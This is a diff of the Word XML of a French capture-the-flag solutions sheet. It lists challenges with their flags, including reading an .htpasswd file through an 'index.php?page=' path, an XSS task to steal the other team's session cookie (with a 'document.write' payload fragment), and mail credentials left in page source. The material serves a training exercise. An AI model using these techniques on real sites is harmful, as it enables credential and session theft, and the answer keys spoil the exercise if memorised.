+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Solution : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Analyser l’arborescence et accéder au .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>htpasswd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>index.php?page</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>=admin/.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>htpasswd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Flag de la faille A : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>M0nmdp$ecure123htpasswd</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Flag de la faille B : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>C3siteE$tpasSecur3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1065"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Nom de la faille :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>http-023</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Catégorie de la faille </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>http</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Objectif de la faille : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">XSS </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>TeamA</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vs </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>TeamB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Difficulté de la faille :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Description de la faille : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Volez le cookie de session de l'autre équipe pour valider le flag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Capture d’écran :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1065"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40BA98FB" wp14:editId="518B9A91">
+            <wp:extent cx="5391150" cy="4114800"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="19" name="Image 19"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId29"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="5391150" cy="4114800"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -12261,15 +12432,6 @@
         <w:t>document.write</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -12278,7 +12440,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>\'&lt;</w:t>
+        <w:t>(\'&lt;</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -12851,660 +13013,6 @@
             <wp:extent cx="5760720" cy="1309422"/>
             <wp:effectExtent l="0" t="0" r="0" b="5080"/>
             <wp:docPr id="29" name="Image 29"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId28"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5760720" cy="1309422"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31893457" wp14:editId="77A9CC3D">
-            <wp:extent cx="5760720" cy="3072057"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="30" name="Image 30"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId29"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5760720" cy="3072057"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:t>Solution :</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Inspecter le code de la page formulaire, elle contient les identifiants de la boîte mail, ensuite les flags sont enregistré dans « à conserver » et dans « brouillon ».</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:t>Flag team A :</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>cetaitpassiduraufinal</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:t>Flag team B :</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>cesttropfacilequandmeme</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1065"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1065"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Nom de la faille :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>http-028</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Catégorie de la faille </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>http</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Objectif de la faille : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
